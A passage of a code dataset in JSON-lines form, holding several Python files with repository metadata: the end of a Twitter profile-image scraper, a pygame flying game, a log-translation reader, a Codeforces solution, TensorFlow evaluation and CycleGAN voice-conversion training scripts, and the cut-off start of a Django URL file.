image_url_list:\n # comprueba si la url existe en el diccionario, si existe: no la descarga\n if account not in perfils_dict.keys() or web_url not in perfils_dict.get(account):\n # descargar la imagen ---------------------------------\n folder = images_path + account\n download_image(web_url, folder, idx)\n perfils_dict = url_to_dict(perfils_dict, web_url, account)\n idx += 1\n else:\n log('- La imagen ya existe en el diccionario')\n \n save_accounts_dict(perfils_dict) # guarda el diccionario\n\ndef attack_list(perfils_list: list):\n for account in perfils_list:\n attack(account)\n\n\ndef log(msg):\n if verbose:\n print(f'log: {msg}')\n\n# RECORDATORIO - Para funciones como esta, que realizan una acción a cada uno\n# de los elementos de esa lista. Crea una función que solo se lo haga a un elemento y\n# crea otra que reciba la lista y la itere\n\n\nif __name__ == '__main__':\n verbose = True\n max_images = 4\n login_twitter()\n # cuentas = list(load_accounts_dict().keys())\n cuentas = ['meowinxi', 'Brananaxx']\n # attack_list(cuentas)\n","repo_name":"CotherArt/lew-spider","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6839,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"8647659021","text":"import pygame\nimport os\nfrom Background import Background\nfrom Obstacle import Obstacle\nfrom Cloud import Cloud\nfrom Button import Button\nimport sys\nimport random\nimport json\n\npygame.init()\n\nWIDTH, HEIGHT = 900, 500\nWIN = pygame.display.set_mode((WIDTH, HEIGHT))\n\nSCORE_FONT = pygame.font.Font(\"font/pixel_font.ttf\", 32)\nESC_FONT = pygame.font.Font(\"font/pixel_font.ttf\", 24)\nGAME_END_FONT = SCORE_FONT\nEND_SCORE_FONT = pygame.font.Font(\"font/pixel_font.ttf\", 22)\n\npygame.display.set_caption('PyWings')\nBG = Background(WIN)\nBG_IMAGE = pygame.transform.scale(\n pygame.image.load('images/bg.jpg'), (900, 500))\n\nLOGO = pygame.transform.scale(\n pygame.image.load('images/logo.png'), (772, 170))\n\nSPEAKER_ON = pygame.transform.scale(\n pygame.image.load('images/speaker_on.png'), (65, 50))\n\nSPEAKER_OFF = pygame.transform.scale(\n pygame.image.load('images/speaker_off.png'), (65, 50))\n\nsound_mode = True\n\npygame.mixer.init()\n\nengine = pygame.mixer.Sound(os.path.join('sounds', 'engine.ogg'))\nmusic = [pygame.mixer.Sound(os.path.join('sounds', 'bg_music1.ogg')), pygame.mixer.Sound(\n os.path.join('sounds', 'bg_music2.ogg'))]\n\ncollision = pygame.mixer.Sound(os.path.join('sounds', 'collision.ogg'))\ncollision.set_volume(0.6)\n\nengine.set_volume(0.2)\n\nfor i in range(len(music)):\n music[i].set_volume(0.2)\n\nSONG_END = pygame.USEREVENT+1\n\npygame.mixer.Channel(1).play(music[random.randint(0, 1)])\npygame.mixer.Channel(1).set_endevent(SONG_END)\n\n# DEV mute\n# pygame.mixer.Channel(1).stop()\n# pygame.mixer.Channel(0).stop()\n\n\ndef play():\n\n FPS = 60\n VEL = 8\n\n BORDER = pygame.Rect(WIDTH//2 - 5, 0, 0, HEIGHT)\n\n PLANE_WIDTH, PLANE_HEIGHT = 100, 60\n\n PLANE_IMAGE = pygame.image.load(\n os.path.join('images', 'plane.png'))\n\n PLANE = pygame.transform.scale(\n PLANE_IMAGE, (PLANE_WIDTH, PLANE_HEIGHT))\n\n ESC = pygame.image.load(os.path.join('images', 'esc_button.png'))\n\n PLANE_ROTATE_UP = pygame.transform.rotate(PLANE, 15)\n PLANE_ROTATE_DOWN = pygame.transform.rotate(PLANE, -15)\n\n global highscore\n highscore = 0\n\n if os.path.exists('data.json'):\n with open('data.json', 'r') as f:\n data = json.load(f)\n if data['highscore'] != 0:\n highscore = data['highscore']\n else:\n highscore = 0\n\n def draw_window(plane, score, keys_pressed, clouds):\n # WIN.blit(BG, (0, 0))\n\n pygame.draw.rect(WIN, (0, 0, 0), BORDER)\n\n if keys_pressed[pygame.K_UP] and plane.y - VEL > 0:\n WIN.blit(PLANE_ROTATE_UP, plane)\n elif keys_pressed[pygame.K_DOWN] and plane.y + VEL + plane.height < HEIGHT - 15:\n WIN.blit(PLANE_ROTATE_DOWN, plane)\n else:\n WIN.blit(PLANE, plane)\n\n WIN.blit(score, (10, 10))\n WIN.blit(SCORE_FONT.render(\n f\"Najlepszy wynik: {highscore}\", 1, 'black'), (10, 40))\n WIN.blit(ESC, (10, 85))\n\n WIN.blit(ESC_FONT.render('- wyjdz do menu', 1, (0, 0, 0)), (55, 80))\n\n pygame.display.update()\n\n def handle_movement(keys_pressed, plane):\n if keys_pressed[pygame.K_LEFT] and plane.x - VEL > 0:\n plane.x -= VEL\n if keys_pressed[pygame.K_RIGHT] and plane.x + VEL + plane.width < BORDER.x:\n plane.x += VEL\n if keys_pressed[pygame.K_UP] and plane.y - VEL > 0:\n plane.y -= VEL\n if keys_pressed[pygame.K_DOWN] and plane.y + VEL + plane.height < HEIGHT - 15:\n plane.y += VEL\n\n if keys_pressed[pygame.K_ESCAPE]:\n main_menu()\n\n def main():\n plane = pygame.Rect(100, 100, PLANE_WIDTH, PLANE_HEIGHT)\n\n if sound_mode:\n pygame.mixer.Channel(0).play(engine, -1)\n else:\n pass\n\n # pygame.mouse.set_visible(False)\n\n pygame.mouse.set_pos((WIDTH//4, HEIGHT//2))\n\n clock = pygame.time.Clock()\n run = True\n pipe_spawn_timer = 0\n cloud_spawn_timer = 0\n\n pipes = []\n clouds = []\n gap_between_pipes = 100\n gap_between_upper_and_lower_pipe = 200\n movement_speed = 10\n\n score = 0\n\n while run:\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n pygame.quit()\n quit()\n if event.type == pygame.MOUSEMOTION:\n if event.pos[0] > BORDER.x:\n plane.x = BORDER.x - plane.width//2\n plane.y = event.pos[1] - plane.height//2\n else:\n plane.move_ip(\n event.pos[0] - plane.centerx, event.pos[1] - plane.centery)\n\n if event.type == SONG_END:\n pygame.mixer.Channel(1).play(music[random.randint(0, 1)])\n\n BG.update()\n BG.render()\n\n pipe_spawn_timer += 1\n cloud_spawn_timer += 1\n\n if pipe_spawn_timer >= gap_between_pipes: # use different values for distance between pipes\n pipes.append(\n Obstacle(WIN, gap_between_upper_and_lower_pipe, movement_speed))\n pipe_spawn_timer = 0\n\n if cloud_spawn_timer >= 75:\n clouds.append(Cloud(WIN))\n cloud_spawn_timer = 0\n\n for cloud in clouds:\n cloud.draw()\n cloud.update()\n\n for pipe in pipes:\n pipe.draw()\n pipe.update()\n\n if pipe.collide(plane):\n run = False # reset the game\n if sound_mode:\n pygame.mixer.Channel(2).play(collision)\n pygame.mixer.Channel(0).stop()\n\n for pipe in pipes:\n if pipe.score(plane):\n score += 1\n if gap_between_pipes != 20:\n gap_between_pipes -= 2\n if gap_between_upper_and_lower_pipe != plane.height + 20:\n gap_between_upper_and_lower_pipe -= 2\n\n movement_speed += .2\n\n # first pipe will be leftmost pipe.\n if pipes and pipes[0].upper_rect.right < 0:\n pipes.pop(0)\n\n keys_pressed = pygame.key.get_pressed()\n handle_movement(keys_pressed, plane)\n\n score_text = SCORE_FONT.render(\n f\"Wynik: {score}\", 1, (0, 0, 0))\n\n draw_window(plane, score_text, keys_pressed, clouds)\n\n # End screen\n end_screen(score)\n main()\n\n\ndef end_screen(score):\n run = True\n\n end_score_text = END_SCORE_FONT.render(\n f\"Twój wynik: {score}\", 1, 'black')\n end_text = GAME_END_FONT.render(\"Koniec gry!\", 1, 'black')\n SPACE = pygame.image.load(os.path.join('images', 'space_button.png'))\n\n s = pygame.Surface((375, 150)) # the size of your rect\n s.set_alpha(128) # alpha level\n s.fill((255, 255, 255))\n WIN.blit(s, (WIDTH//2 - end_text.get_width() //\n 2 - 10, HEIGHT-(HEIGHT//1.1)))\n\n if os.path.exists('data.json'):\n with open('data.json', 'r') as f:\n data = json.load(f)\n if score > data['highscore']:\n data['highscore'] = score\n with open('data.json', 'w') as f:\n json.dump(data, f)\n else:\n data = {'highscore': score}\n with open('data.json', 'w') as f:\n json.dump(data, f)\n\n while run:\n\n # pygame.draw.rect(WIN, (0, 0, 0, 0.5), score_rect)\n WIN.blit(end_text, (WIDTH//2 - end_text.get_width() //\n 2, HEIGHT-(HEIGHT//1.1)))\n WIN.blit(end_score_text, (WIDTH//2 - end_text.get_width() //\n 2, HEIGHT-(HEIGHT//1.2)))\n\n WIN.blit(SPACE, (WIDTH//2 - end_text.get_width() //\n 2, HEIGHT-(HEIGHT//1.4)))\n\n WIN.blit(ESC_FONT.render('- spróbuj jeszcze raz', 1, 'black'), (WIDTH//2 - end_text.get_width() //\n 2 + 70, HEIGHT-(HEIGHT//1.4)-10))\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n if event.type == pygame.K_ESCAPE:\n run = False\n main_menu()\n if event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:\n run = False\n play()\n if event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:\n run = False\n main_menu()\n\n pygame.display.update()\n\n\ndef main_menu():\n\n global sound_mode\n\n pygame.mouse.set_visible(True)\n\n pygame.mixer.Channel(0).stop()\n\n if sound_mode:\n SPEAKER_BUTTON = Button(image=SPEAKER_ON, pos=(WIDTH-50, HEIGHT-50),\n text_input=\"\", font=pygame.font.Font(\n \"font/pixel_font.ttf\", 32), base_color=\"#d7fcd4\", hovering_color=\"White\")\n else:\n SPEAKER_BUTTON = Button(image=SPEAKER_OFF, pos=(WIDTH-50, HEIGHT-50),\n text_input=\"\", font=pygame.font.Font(\n \"font/pixel_font.ttf\", 32), base_color=\"#d7fcd4\", hovering_color=\"White\")\n\n while True:\n WIN.blit(BG_IMAGE, (0, 0))\n\n MENU_MOUSE_POS = pygame.mouse.get_pos()\n\n MENU_RECT = LOGO.get_rect(center=(WIDTH//2, HEIGHT//2-150))\n\n PLAY_BUTTON = Button(image=pygame.transform.scale(pygame.image.load(\"images/Play Rect.png\"), (200, 50)), pos=(WIDTH//2, HEIGHT//2),\n text_input=\"GRAJ\", font=pygame.font.Font(\n \"font/pixel_font.ttf\", 32), base_color=\"#d7fcd4\", hovering_color=\"White\")\n QUIT_BUTTON = Button(image=pygame.transform.scale(pygame.image.load(\"images/Quit Rect.png\"), (200, 50)), pos=(WIDTH//2, HEIGHT//2+75),\n text_input=\"WYJDZ\", font=pygame.font.Font(\n \"font/pixel_font.ttf\", 32), base_color=\"#d7fcd4\", hovering_color=\"White\")\n\n WIN.blit(LOGO, MENU_RECT)\n\n for button in [PLAY_BUTTON, SPEAKER_BUTTON, QUIT_BUTTON]:\n button.changeColor(MENU_MOUSE_POS)\n button.update(WIN)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if PLAY_BUTTON.checkForInput(MENU_MOUSE_POS):\n play()\n if QUIT_BUTTON.checkForInput(MENU_MOUSE_POS):\n pygame.quit()\n sys.exit()\n if SPEAKER_BUTTON.checkForInput(MENU_MOUSE_POS):\n if SPEAKER_BUTTON.image == SPEAKER_ON:\n SPEAKER_BUTTON.image = SPEAKER_OFF\n pygame.mixer.Channel(0).stop()\n pygame.mixer.Channel(1).stop()\n sound_mode = False\n else:\n SPEAKER_BUTTON.image = SPEAKER_ON\n pygame.mixer.Channel(1).play(\n music[random.randint(0, 1)])\n sound_mode = True\n\n if event.type == SONG_END:\n pygame.mixer.Channel(1).play(music[random.randint(0, 1)])\n\n pygame.display.update()\n\n\nif __name__ == '__main__':\n main_menu()\n","repo_name":"MatiuDev/PyWings","sub_path":"PyWings/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11340,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"30794743841","text":"# This is a sample Python script.\nimport importlib\nimport os\nimport threading\nimport traceback\nfrom collections import deque\nfrom os import cpu_count\n\nfrom rx.core.observer import AutoDetachObserver\nfrom rx.subject import Subject\n\nimport log_translate.globals\nfrom log_translate.config_default import translators\nfrom log_translate.data_struct import Log, Level\nfrom log_translate.globals import remember_values_reset\n\n\n# //必须定义在使用者前面\nclass LogReader(object):\n def __init__(self,\n chunk_size=1024 * 1024 * 10,\n process_num_for_log_parsing=cpu_count()):\n self.log_unparsed_queue = deque() # 用于存储未解析日志\n self.log_line_parsed_queue = deque() # 用于存储已解析日志行\n self.is_all_files_read = False # 标识是否已读取所有日志文件\n self.process_num_for_log_parsing = process_num_for_log_parsing # 并发解析日志文件进程数\n self.chunk_size = chunk_size # 每次读取日志的日志块大小\n self.files_read_list = [] # 存放已读取日志文件\n self.log_parsing_finished = False # 标识是否完成日志解析\n self.log_stream = Subject()\n # 翻译\n try:\n config = importlib.import_module(\"config\")\n self.log_translators = getattr(config, \"translators\")\n except:\n self.log_translators = translators\n traceback.print_exc()\n # 要在读取了配置之后设置\n self.log_stream._subscribe_core(AutoDetachObserver(on_next=log_translate.globals.log_watcher))\n\n @staticmethod\n def readFile(path=\".\"):\n with open(path, \"rb\") as f:\n for fline in f:\n yield fline\n f.close()\n\n def analyze(self, path):\n # 分行读取数据\n remember_values_reset()\n for datas in self.readFile(path):\n # 对日志进行翻译\n try:\n str = datas.decode('ISO-8859-1').strip()\n for translator in self.log_translators:\n try:\n # 读取的字符串如果是\\x000这种表示文件没有用utf-8保存\n result = translator.translate(str)\n # 翻译后的日志通过RxStream转发出去\n if result:\n result.origin = str\n # if len(self.log_stream.observers) == 0:\n # result.print()\n self.log_stream.on_next(result)\n break\n except Exception as e:\n print(f'日志翻译发生异常:{e} -> ${str}')\n traceback.print_exc()\n self.log_stream.on_next(\n Log(translated=\"日志翻译发生异常:%s \\n%s\" % (str, traceback.format_exc()), level=Level.e)\n )\n except Exception as e:\n print('文件解析发生异常:', e)\n traceback.print_exc()\n self.log_stream.on_next(Log(translated=\"文件解析发生异常:%s\" % traceback.format_exc(), level=Level.e))\n self.log_stream.on_next(Log(translated=None))\n\n def concurrency(self, log_files):\n # 多线程 解析\n for file in log_files:\n abspath = os.path.abspath(file)\n print(abspath)\n threading_thread = threading.Thread(target=self.analyze, name=\"read_log_file\", args=(abspath,))\n threading_thread.start()\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n parse_log = LogReader()\n # parse_log.concurrency([\"D:\\\\main_log_1__2023_0429_100141\"])\n # parse_log.concurrency([\"./android-0823_232307-1.txt\"])\n parse_log.concurrency([\"./main_log_1__2023_0429_100141.txt\"])\n","repo_name":"5hmlA/pyTools","sub_path":"log_translate/log_translate/read_log_file.py","file_name":"read_log_file.py","file_ext":"py","file_size_in_byte":3907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"22137290788","text":"def solve():\r\n #n = int(input())\r\n n, k = map(int, input().split()) \r\n #a = list(map(int, input().split())) \r\n a = list(map(str, input())) \r\n \r\n dic = {}\r\n for i in a:\r\n if i in dic:\r\n dic[i] += 1\r\n else:\r\n dic[i] = 1 \r\n v = list(dic.values())\r\n pairs = singles = 0\r\n for i in v:\r\n if i % 2 == 0:\r\n pairs += i // 2\r\n i = 0\r\n else:\r\n pairs += (i - 1) // 2\r\n singles += 1\r\n \r\n ans = 2 * (pairs // k) \r\n pairs = max(0, pairs - (ans // 2) * k)\r\n singles += 2 * pairs \r\n if singles >= k:\r\n ans += 1\r\n print(ans)\r\n \r\nfor _ in range(int(input())):\r\n solve()\r\n\r\n ","repo_name":"mlabeeb03/codeforces","sub_path":"Palindromes Coloring.py","file_name":"Palindromes Coloring.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37527929339","text":"# verbose to stdout or log to file (in another format)\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport reader, os\nfrom model import PIModel\nimport numpy as np\nfrom sklearn.metrics import f1_score\nimport tensorflow as tf\n\nflags = tf.flags\nlogging = tf.logging\n\nflags.DEFINE_string(\"config_path\", \"conf.py\", \"config_path\")\n\nFLAGS = flags.FLAGS\n\ndef run_eval(session, m, data, eval_op):\n \"\"\"Runs the model on the given data.\"\"\"\n num_epoch = len(data[0]) // m.batch_size\n costs = 0.0\n iters = 0\n totalacc = 0.0\n preds = []\n for step, (prem, hyp, premmask, hypmask, label) in enumerate(reader.pi_iterator(data, m.batch_size, reshuffle=False)):\n pred, cost, state, acc, _ = session.run([m.pred, m.cost, m.final_state, m.acc, eval_op], # eliminated m.acc\n {m.input_prem: prem,\n m.input_hyp: hyp,\n m.prem_mask: premmask,\n m.hyp_mask: hypmask,\n m.targets: label})\n costs += cost\n totalacc += acc\n iters += 1\n preds += list(pred)\n return preds, costs / iters, totalacc / iters\n\ndef get_config(config_path):\n class conf(object): pass\n with open(config_path) as f:\n for line in f:\n if 'import' not in line and len(line) > 0:\n exec(\"conf.\"+line[:-1])\n return conf\n\ndef main(_):\n if not FLAGS.config_path:\n raise ValueError(\"Must set --config_path\")\n\n single_preset = get_config(FLAGS.config_path)\n raw_data = reader.pi_raw_data(single_preset.data_path)\n train_data, valid_data, test_data = raw_data\n\n single_preset.batch_size = 1\n\n with tf.Graph().as_default(), tf.Session() as session:\n initializer = tf.random_normal_initializer(mean=0.0,\n stddev=single_preset.init_scale)\n\n with tf.variable_scope(\"model\", reuse=None, initializer=initializer):\n m_val = PIModel(is_training=False, num_steps_prem=max(valid_data[2])+1,\n num_steps_hyp=max(valid_data[3])+1, preset=single_preset)\n\n with tf.variable_scope(\"model\", reuse=True, initializer=initializer):\n m_test = PIModel(is_training=False, num_steps_prem=max(test_data[2])+1,\n num_steps_hyp=max(test_data[3])+1, preset=single_preset)\n\n\n tf.global_variables_initializer().run()\n\n # Retrieving model checkpoint\n saver = tf.train.Saver()\n ckpt = tf.train.get_checkpoint_state(single_preset.checkpoint_path)\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(session, ckpt.model_checkpoint_path)\n else:\n raise ValueError(\"No checkpoint found. Set a valid --checkpoint_path for model evaluation\")\n\n # m.assign_lr(session, batch_preset.learning_rate)\n\n val_pred, valid_loss, valid_acc = run_eval(session, m_val, valid_data, tf.no_op())\n print(\"Val loss: %.3f, acc: %.3f\\n\" % (valid_loss, valid_acc))\n\n test_pred, test_loss, test_acc = run_eval(session, m_test, test_data, tf.no_op())\n print(\"Test loss: %.3f, acc: %.3f\\n\" % (test_loss, test_acc))\n\n with open(os.path.join(single_preset.data_path,'pred.val'),'w') as f:\n for p in val_pred:\n f.write(reader._revert(p) + '\\n')\n with open(os.path.join(single_preset.data_path,'pred.test'), 'w') as g:\n for p in test_pred:\n g.write(reader._revert(p) + '\\n')\n\nif __name__ == \"__main__\":\n tf.app.run()\n","repo_name":"pakapol/phrasal-implicatives","sub_path":"dataGen/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"45612318224","text":"import os\nimport numpy as np\nimport argparse\nimport time\nimport librosa\nimport soundfile as sf\nimport math\nimport pickle\n\nfrom preprocess import *\nfrom model import CycleGAN \nimport tensorflow as tf\n\ndef loadPickleFile(fileName):\n with open(fileName, 'rb') as f:\n return pickle.load(f)\n\ndef train(train_dir=None, model_dir=None, model_name=None, random_seed=None, validation_A_dir=None, validation_B_dir=None, output_dir=None, tensorboard_log_dir=None,model_weights_dir = None,add_noise=False):\n\n np.random.seed(random_seed)\n\n num_epochs = 5000\n mini_batch_size = 1 # mini_batch_size = 1 is better\n generator_learning_rate = 0.0002\n generator_learning_rate_decay = generator_learning_rate / 200000\n discriminator_learning_rate = 0.0001\n discriminator_learning_rate_decay = discriminator_learning_rate / 200000\n sampling_rate = 16000\n num_mcep = 24\n frame_period = 5.0\n n_frames = 128\n lambda_cycle = 10\n lambda_identity = 5\n\n log_files = np.load(os.path.join(train_dir, 'logf0s_normalization.npz'))\n log_f0s_mean_A, log_f0s_std_A, log_f0s_mean_B, log_f0s_std_B = log_files['log_f0s_mean_A'],log_files['log_f0s_std_A'],log_files['log_f0s_mean_B'],log_files['log_f0s_std_B']\n\n mcep_files = np.load(os.path.join(train_dir, 'mcep_normalization.npz'))\n coded_sps_A_mean,coded_sps_A_std,coded_sps_B_mean,coded_sps_B_std = mcep_files['coded_sps_A_mean'],mcep_files['coded_sps_A_std'],mcep_files['coded_sps_B_mean'],mcep_files['coded_sps_B_std']\n \n coded_sps_A_norm, coded_sps_B_norm = loadPickleFile(os.path.join(train_dir, 'coded_sps_A_norm.pickle')), loadPickleFile(os.path.join(train_dir, 'coded_sps_B_norm.pickle'))\n\n if validation_A_dir is not None:\n validation_A_output_dir = os.path.join(output_dir, 'converted_A')\n if not os.path.exists(validation_A_output_dir):\n os.makedirs(validation_A_output_dir)\n\n if validation_B_dir is not None:\n validation_B_output_dir = os.path.join(output_dir, 'converted_B')\n if not os.path.exists(validation_B_output_dir):\n os.makedirs(validation_B_output_dir)\n\n\n model = CycleGAN(num_features = num_mcep,num_frames=n_frames,add_noise=add_noise)\n if model_weights_dir is not None:\n model.load(model_weights_dir)\n\n for epoch in range(num_epochs):\n \n print('Epoch: %d' % epoch)\n '''\n if epoch > 60:\n lambda_identity = 0\n if epoch > 1250:\n generator_learning_rate = max(0, generator_learning_rate - 0.0000002)\n discriminator_learning_rate = max(0, discriminator_learning_rate - 0.0000001)\n '''\n\n start_time_epoch = time.time()\n\n dataset_A, dataset_B = sample_train_data(dataset_A = coded_sps_A_norm, dataset_B = coded_sps_B_norm, n_frames = n_frames)\n\n n_samples = dataset_A.shape[0]\n\n for i in range(n_samples // mini_batch_size):\n num_iterations = (n_samples // mini_batch_size) * epoch + i\n\n if num_iterations > 5000:\n lambda_identity = 0\n if num_iterations > 2*1e4:\n generator_learning_rate = max(0, generator_learning_rate - generator_learning_rate_decay)\n discriminator_learning_rate = max(0, discriminator_learning_rate - discriminator_learning_rate_decay)\n\n start = i * mini_batch_size\n end = (i + 1) * mini_batch_size\n generator_loss, discriminator_loss = model.forward_pass(dataset_A[start:end],dataset_B[start:end],lambda_cycle,lambda_identity,generator_learning_rate,discriminator_learning_rate)\n\n if i % 50 == 0:\n #print('Iteration: %d, Generator Loss : %f, Discriminator Loss : %f' % (num_iterations, generator_loss, discriminator_loss))\n print('Iteration: {:07d}, Generator Learning Rate: {:.7f}, Discriminator Learning Rate: {:.7f}, Generator Loss : {:.3f}, Discriminator Loss : {:.3f}'.format(num_iterations, generator_learning_rate, discriminator_learning_rate, generator_loss, discriminator_loss))\n\n # model.save(directory = model_dir, filename = model_name)\n if epoch%5==0:\n print(\"Saving model...\")\n model.save(model_dir,f\"{model_name}_epoch{epoch}\")\n\n end_time_epoch = time.time()\n time_elapsed_epoch = end_time_epoch - start_time_epoch\n\n print('Time Elapsed for This Epoch: %02d:%02d:%02d' % (time_elapsed_epoch // 3600, (time_elapsed_epoch % 3600 // 60), (time_elapsed_epoch % 60 // 1)))\n\n if validation_A_dir is not None:\n if num_iterations % 1000 == 0:\n print('Generating Validation Data B from A...')\n for file in os.listdir(validation_A_dir):\n filepath = os.path.join(validation_A_dir, file)\n wav, _ = librosa.load(filepath, sr = sampling_rate, mono = True)\n wav = wav_padding(wav = wav, sr = sampling_rate, frame_period = frame_period, multiple = 4)\n f0, timeaxis, sp, ap = world_decompose(wav = wav, fs = sampling_rate, frame_period = frame_period)\n f0_converted = pitch_conversion(f0 = f0, mean_log_src = log_f0s_mean_A, std_log_src = log_f0s_std_A, mean_log_target = log_f0s_mean_B, std_log_target = log_f0s_std_B)\n coded_sp = world_encode_spectral_envelop(sp = sp, fs = sampling_rate, dim = num_mcep)\n coded_sp_transposed = coded_sp.T\n coded_sp_norm = np.array((coded_sp_transposed - coded_sps_A_mean) / coded_sps_A_std)\n padding = np.zeros((coded_sp_norm.shape[0],n_frames*math.ceil(coded_sp_norm.shape[1]/n_frames) - coded_sp_norm.shape[1]))\n padded_coded_sp_norm = np.concatenate([coded_sp_norm,padding],axis=1)\n preds= []\n for start_frame in range(0,padded_coded_sp_norm.shape[1],n_frames):\n preds.append(np.squeeze(model.test(np.expand_dims(padded_coded_sp_norm[:,start_frame:start_frame+n_frames],axis=0), 'A2B').numpy(),axis=0))\n coded_sp_converted_norm = np.concatenate(preds,axis=1)\n coded_sp_converted = coded_sp_converted_norm[:,:coded_sp_norm.shape[1]] * coded_sps_B_std + coded_sps_B_mean\n coded_sp_converted = coded_sp_converted.T\n coded_sp_converted = np.ascontiguousarray(coded_sp_converted)\n decoded_sp_converted = world_decode_spectral_envelop(coded_sp = coded_sp_converted, fs = sampling_rate)\n wav_transformed = world_speech_synthesis(f0 = f0_converted, decoded_sp = decoded_sp_converted, ap = ap, fs = sampling_rate, frame_period = frame_period)\n # librosa.output.write_wav(os.path.join(validation_A_output_dir, os.path.basename(file)), wav_transformed, sampling_rate)\n sf.write(os.path.join(validation_A_output_dir, os.path.basename(file)), wav_transformed, sampling_rate, 'PCM_24')\n model.save(model_dir,f\"{model_name}_epoch{epoch}\")\n\n\n if validation_B_dir is not None:\n # if num_iterations % 1000 == 0:\n print('Generating Validation Data A from B...')\n for file in os.listdir(validation_B_dir):\n filepath = os.path.join(validation_B_dir, file)\n wav, _ = librosa.load(filepath, sr = sampling_rate, mono = True)\n wav = wav_padding(wav = wav, sr = sampling_rate, frame_period = frame_period, multiple = 4)\n f0, timeaxis, sp, ap = world_decompose(wav = wav, fs = sampling_rate, frame_period = frame_period)\n f0_converted = pitch_conversion(f0 = f0, mean_log_src = log_f0s_mean_B, std_log_src = log_f0s_std_B, mean_log_target = log_f0s_mean_A, std_log_target = log_f0s_std_A)\n coded_sp = world_encode_spectral_envelop(sp = sp, fs = sampling_rate, dim = num_mcep)\n coded_sp_transposed = coded_sp.T\n coded_sp_norm = np.array((coded_sp_transposed - coded_sps_B_mean) / coded_sps_B_std)\n padding = np.zeros((coded_sp_norm.shape[0],n_frames*math.ceil(coded_sp_norm.shape[1]/n_frames) - coded_sp_norm.shape[1]))\n padded_coded_sp_norm = np.concatenate([coded_sp_norm,padding],axis=1)\n preds= []\n for start_frame in range(0,padded_coded_sp_norm.shape[1],n_frames):\n preds.append(np.squeeze(model.test(np.expand_dims(padded_coded_sp_norm[:,start_frame:start_frame+n_frames],axis=0), 'B2A').numpy(),axis=0))\n coded_sp_converted_norm = np.concatenate(preds,axis=1)\n coded_sp_converted = coded_sp_converted_norm[:,:coded_sp_norm.shape[1]] * coded_sps_A_std + coded_sps_A_mean\n coded_sp_converted = coded_sp_converted.T\n coded_sp_converted = np.ascontiguousarray(coded_sp_converted)\n decoded_sp_converted = world_decode_spectral_envelop(coded_sp = coded_sp_converted, fs = sampling_rate)\n wav_transformed = world_speech_synthesis(f0 = f0_converted, decoded_sp = decoded_sp_converted, ap = ap, fs = sampling_rate, frame_period = frame_period)\n sf.write(os.path.join(validation_B_output_dir, os.path.basename(file)), wav_transformed, sampling_rate, 'PCM_24')\n model.save(model_dir,f\"{model_name}_epoch{epoch}\")\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description = 'Train CycleGAN model for datasets.')\n\n preprocessed_dir_default = './data/vcc2016_training/SF1'\n model_dir_default = './model/sf1_tf2'\n model_name_default = 'sf1_tf2.ckpt'\n random_seed_default = 0\n validation_A_dir_default = './data/evaluation_all/SF1'\n # validation_B_dir_default = './data/evaluation_all/TF2'\n validation_B_dir_default = None\n output_dir_default = './validation_output'\n # output_dir_default = './tf_2_version'\n tensorboard_log_dir_default = './log'\n load_model_weights = 'None'\n\n parser.add_argument('--preprocessed_dir', type = str, help = 'Directory for preprocessed dataset.', default = preprocessed_dir_default)\n parser.add_argument('--model_dir', type = str, help = 'Directory for saving models.', default = model_dir_default)\n parser.add_argument('--model_name', type = str, help = 'File name for saving model.', default = model_name_default)\n parser.add_argument('--random_seed', type = int, help = 'Random seed for model training.', default = random_seed_default)\n parser.add_argument('--validation_A_dir', type = str, help = 'Convert validation A after each training epoch. If set none, no conversion would be done during the training.', default = validation_A_dir_default)\n parser.add_argument('--validation_B_dir', type = str, help = 'Convert validation B after each training epoch. If set none, no conversion would be done during the training.', default = validation_B_dir_default)\n parser.add_argument('--output_dir', type = str, help = 'Output directory for converted validation voices.', default = output_dir_default)\n parser.add_argument('--tensorboard_log_dir', type = str, help = 'TensorBoard log directory.', default = tensorboard_log_dir_default)\n parser.add_argument('--load_model',type= str, help = 'Load weights from this directory', default = load_model_weights)\n parser.add_argument('--add_noise',type= bool, help = 'Load weights from this directory', default = False)\n argv = parser.parse_args()\n\n preprocessed_dir = argv.preprocessed_dir\n output_dir = argv.model_dir\n model_name = argv.model_name\n random_seed = argv.random_seed\n validation_A_dir = None if argv.validation_A_dir == 'None' or argv.validation_A_dir == 'none' else argv.validation_A_dir\n validation_B_dir = None if argv.validation_B_dir == 'None' or argv.validation_B_dir == 'none' else argv.validation_B_dir\n output_dir = argv.output_dir\n tensorboard_log_dir = argv.tensorboard_log_dir\n load_model_weights = None if argv.load_model == 'None' or argv.load_model == 'none' else argv.load_model\n add_noise = argv.add_noise\n\n train(train_dir = preprocessed_dir, model_dir = output_dir, model_name = model_name, random_seed = random_seed, validation_A_dir = validation_A_dir, validation_B_dir = validation_B_dir, output_dir = output_dir, tensorboard_log_dir = tensorboard_log_dir, model_weights_dir = load_model_weights,add_noise=add_noise)\n","repo_name":"IEEE-NITK/Voice-Swapper","sub_path":"tf_2_version/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":12384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33459191439","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.shop, 